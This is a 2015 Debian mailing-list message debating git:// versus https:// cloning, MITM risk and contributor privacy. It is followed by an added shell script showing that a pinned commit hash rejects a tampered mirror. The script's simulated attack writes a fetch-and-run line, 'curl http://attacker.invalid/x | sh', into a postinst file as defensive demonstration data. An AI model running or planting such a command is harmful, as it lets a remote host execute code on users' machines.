On 27 May 2015 at 23:00, <j...@joshtriplett.org> wrote:
> On Wed, May 27, 2015 at 10:44:17PM +0100, Dimitri John Ledkov wrote:
>> On 27 May 2015 at 09:08, Wouter Verhelst <wou...@debian.org> wrote:
>> > On Mon, May 25, 2015 at 11:38:06AM -0700, Josh Triplett wrote:
>> >> > While we're on the subject of git security... should we stop
>> >> > recommending that non-account-holders use git:// (most efficient, but
>> >> > insecure against MITM unless you manually check the commit number) in
>> >> > preference to https:// (at least some security)?
>> >> > https://wiki.debian.org/Alioth/Git#Accessing_repositories
>> >>
>> >> https:// is actually just as efficient as git:// these days (other than
>> >> the minor overhead of TLS, which is worth it for security).
>> >
>> > Why? Which attack do you envision (other than the ridiculous "the NSA
>> > would see that we're pushing!", which they can by just doing a git clone
>> > too) that would be thwarted by https but not by signed commits?
>> >
>>
>> It fails The Dissident Test, hence we should use https or ssh for
>> cloning. And provide only those methods.
>>
>> Overall we should default to protect the privacy of DDs, contributors
>> and our users. I was pondering for some time if we should add that to
>> DFSG or maybe have a GR about it.
>
> The security of a program is orthogonal to its licensing; let's not mix
> the two. I agree that we should push for TLS, but that's not a DFSG
> matter.
Dunno, it's blurry to me. Shall we remove telnet?! Shall we not?! Server /
client / both?! A lot of times I view lack of privacy as RC-buggy.

Anyway, we are digressing.

-- 
Regards,

Dimitri.

Archive: https://lists.debian.org/canbhlujh7jv549srljexzcyik4rsy1shcmzlh6exp2p3owd...@mail.gmail.com
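The "manually check the commit number" step Josh refers to, written out as an added example that is not part of the thread or of any Debian tooling. It assumes only that git is installed; the upstream repository, the attacker-controlled mirror and the clones are all constructed locally in a temporary directory, and file:// stands in for git:// because neither transport authenticates who served the objects. The hash you compare against is whatever you obtained out of band (the project's https:// web view, a signed announcement), which is exactly the value an on-path attacker on git:// cannot forge:

```shell
#!/bin/sh
# Added example (not from the thread): pin the commit you expect after cloning
# over a transport that does not authenticate the server, such as git://.
# Assumes git is installed. All repositories below are constructed locally;
# file:// stands in for git://, since neither proves who served the objects.
set -eu

# Identity for the constructed commits (any value will do).
export GIT_AUTHOR_NAME=example GIT_AUTHOR_EMAIL=example@example.invalid
export GIT_COMMITTER_NAME=example GIT_COMMITTER_EMAIL=example@example.invalid

# verify_head CLONE_DIR EXPECTED_SHA
# Succeeds only if HEAD of the clone is exactly the commit obtained out of
# band (the project's https:// web view, a signed announcement, ...).
verify_head() {
  actual=$(git -C "$1" rev-parse HEAD 2>/dev/null || true)
  [ -n "$actual" ] && [ "$actual" = "$2" ]
}

# make_upstream DIR: the genuine history; prints the trusted HEAD SHA.
make_upstream() {
  git init -q "$1"
  echo 'hello' > "$1/README"
  git -C "$1" add README
  git -C "$1" commit -q -m 'initial import'
  git -C "$1" rev-parse HEAD
}

# make_tampered_mirror UPSTREAM DIR: what an on-path attacker could serve in
# place of upstream over git://: the real history plus one extra commit.
make_tampered_mirror() {
  git clone -q "file://$1" "$2"
  echo 'curl http://attacker.invalid/x | sh' > "$2/postinst"
  git -C "$2" add postinst
  git -C "$2" commit -q -m 'harmless cleanup'
}

# demo: returns 0 when the genuine clone passes the pinned-hash check and the
# tampered clone fails it; anything else returns 1.
demo() {
  work=$(mktemp -d)
  trusted=$(make_upstream "$work/upstream")
  make_tampered_mirror "$work/upstream" "$work/mirror"

  git clone -q "file://$work/upstream" "$work/clone-genuine"
  git clone -q "file://$work/mirror"   "$work/clone-tampered"

  rc=0
  verify_head "$work/clone-genuine" "$trusted" || rc=1
  if verify_head "$work/clone-tampered" "$trusted"; then rc=1; fi

  rm -rf "$work"
  return $rc
}

if demo; then
  echo "pinned-hash check: genuine clone accepted, tampered clone rejected"
else
  echo "pinned-hash check: unexpected result" >&2
  exit 1
fi
```

The check catches substitution on the wire, which is the git:// weakness the thread is about, but it is only as good as the channel the pinned hash came from; https:// gives you that channel by authenticating the server, not the content. The "signed commits" Wouter mentions are the end-to-end form of the same idea: `git verify-commit HEAD` or `git verify-tag` against keys you already trust holds regardless of which transport delivered the objects.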